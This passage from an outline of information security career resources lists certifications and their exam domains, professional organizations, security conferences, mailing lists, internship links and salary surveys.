    2. Certifications
      1. High-Level Certifications
        1. (ISC)2
          1. www.isc2.org
          2. About (ISC)2
          3. Headquartered in the United States
          4. offices in
          5. London
          6. Hong Kong
          7. Tokyo
          8. maintains the CBK (Common Body of Knowledge), the compendium of topics its exams cover
          9. Associate of (ISC)2
          10. This designation was created for individuals who do not meet the experience requirements to obtain any of the other certifications with (ISC)2
          11. employer that the associates have the knowledge to obtain the certifications, even if they don’t have the experience
          12. SSCP [(ISC)2]
          13. Access Controls
          14. Analysis and Monitoring
          15. Cryptography
          16. Malicious Code
          17. Networks and Telecommunications
          18. Risk, Response, and Recovery
          19. Security Operations and Administration
          20. Certification and Accreditation Professional (CAP)
          21. Understanding the Purpose of Certification
          22. Initiation of the System Authorization Process
          23. Certification Phase
          24. Accreditation Phase
          25. Continuous Monitoring Phase
          26. Certified Secure Software Lifecycle Professional (CSSLP) [(ISC)2]
          27. Secure Software Concepts
          28. Secure Software Requirements
          29. Secure Software Design
          30. Secure Software Implementation/Coding
          31. Secure Software Testing
          32. Software Acceptance
          33. Software Deployment, Operations, Maintenance, and Disposal
          34. CISSP [(ISC)2]
          35. Access Control
          36. Application Security
          37. Business Continuity Planning (BCP) and Disaster Recovery Planning (DRP)
          38. Cryptography
          39. Information Security and Risk Management
          40. Legal, Regulations, Compliance, and Investigations
          41. Operations Security
          42. Physical (Environmental) Security
          43. Security Architecture and Design
          44. Telecommunications and Network Security
          45. CISSP-ISSAP [(ISC)2]
          46. Access Control Systems and Methodology
          47. Cryptography
          48. Physical Security Integration
          49. Requirements Analysis and Security Standards, Guidelines and Criteria
          50. Technology-Related BCP and DRP
          51. Telecommunications and Network Security
          52. CISSP-ISSEP [(ISC)2]
          53. C&A
          54. Systems Security Engineering
          55. Technical Management
          56. U.S. Government Information Assurance Regulations
          57. CISSP-ISSMP [(ISC)2]
          58. BCP and DRP and Continuity of Operations Planning
          59. Enterprise Security Management Practices
          60. Enterprise-wide System Development Security
          61. Law, Investigations, Forensics, and Ethics
          62. Overseeing Compliance of Operations Security
          63. Information Systems Audit and Control Association
          64. Certified Information Systems Auditor
          65. Certified Information Security Manager
        2. Global Information Assurance Certification
          1. GIAC Security Leadership Certification
          2. GIAC Security Expert
        3. CompTIA
          1. Security +
          2. Network security
          3. Compliance and operational security
          4. Threats and vulnerabilities
          5. Application, data, and host security
          6. Access control and identity management
          7. Cryptography
        4. Project Management Institute
          1. Project Management Professional (PMP)
          2. Initiation
          3. Planning
          4. Executing
          5. Monitoring and Controlling
          6. Closing
        5. Dynamic Systems Development Method Consortium
      2. Skill- and Vendor-Specific Certifications
        1. Cisco
          1. Cisco Certified Network Associate Security
          2. Cisco Certified Network Professional Security
          3. Cisco Certified Internetwork Expert
        2. Global Information Assurance Certification
          1. GIAC Information Security Fundamentals
          2. GIAC Security Essentials Certification
          3. GIAC Web Application Penetration Tester (GWAPT)
          4. GIAC Certified Enterprise Defender (GCED)
          5. GIAC Certified Firewall Analyst (GCFW)
          6. GIAC Certified Intrusion Analyst (GCIA)
          7. GIAC Certified Incident Handler (GCIH)
          8. GIAC Certified Windows Security Administrator (GCWN)
          9. GIAC Certified UNIX Security Administrator (GCUX)
          10. GIAC Certified Forensics Analyst (GCFA)
          11. GIAC Certified Penetration Tester (GPEN)
        3. Check Point
          1. Check Point Certified Security Administrator
          2. Check Point Certified Security Expert
          3. Check Point Certified Managed Security Expert
          4. Check Point Certified Master Architect (CCMA)
        4. Juniper Networks
          1. JNCIA-Junos (Juniper Networks)
          2. Juniper systems certifications JNCIS-SEC
          3. JNCIE-SEC
        5. Oracle
    3. Associations and Organizations
      1. Professional Organizations
        1. American Society for Industrial Security
        2. Institute of Electrical and Electronics Engineers
        3. ISACA
        4. Information Systems Security Association
        5. The Open Organisation of Lockpickers
      2. Conferences
        1. DoD Cyber Crime Conference
        2. Network and Distributed System Security
        3. ShmooCon
        4. GOVSEC and U.S. Law Conference
        5. Theory of Cryptography Conference (TCC)
        6. IEEE Symposium on Security and Privacy
        7. The International Conference on Dependable Systems and Networks (DSN)
        8. REcon (Reverse Engineering Convention)
        9. Black Hat
        10. Computer Security Foundations Symposium
        11. Hackers on Planet Earth (HOPE)
        12. DefCon
        13. International Cryptology Conference
        14. USENIX Security Symposium
        15. European Symposium on Research in Computer Security
        16. International Symposium on Recent Advances in Intrusion Detection
        17. ToorCon
        18. Internet Measurement Conference (IMC)
        19. Microsoft BlueHat Security Briefings
        20. Association for Computing Machinery (ACM) Conference on Computer and Communications Security
        21. Annual Computer Security Applications Conference
        22. Chaos Communication Congress
      3. Local Communities
      4. Mailing Lists
        1. www.Securityfocus.com/archive
        2. Bugtraq
        3. Focus-IDS
        4. INCIDENTS
        5. Security Basics
        6. SecurityJobs
    4. Putting It All Together
      1. Resume
        1. Volunteering
          1. Charities
          2. www.HackersForCharity.org
          3. craigslist.org
          4. Open Source Projects
        2. Internships
          1. www.dhs.gov/student-opportunities
          2. www.fbi.gov/about-us/otd/internships
          3. www.cia.gov/careers/student-opportunities/index.html
          4. www.makingthedifference.org/federalinternships/directory
      2. Job Listings
      3. Salary Surveys
        1. Job Position Surveys
          1. www.Salary.com
          2. http://www.cisco.com/web/learning/employer_resources/pdfs/2012_salary_rpt.pdf
        2. Certification Surveys
      4. Personal Documents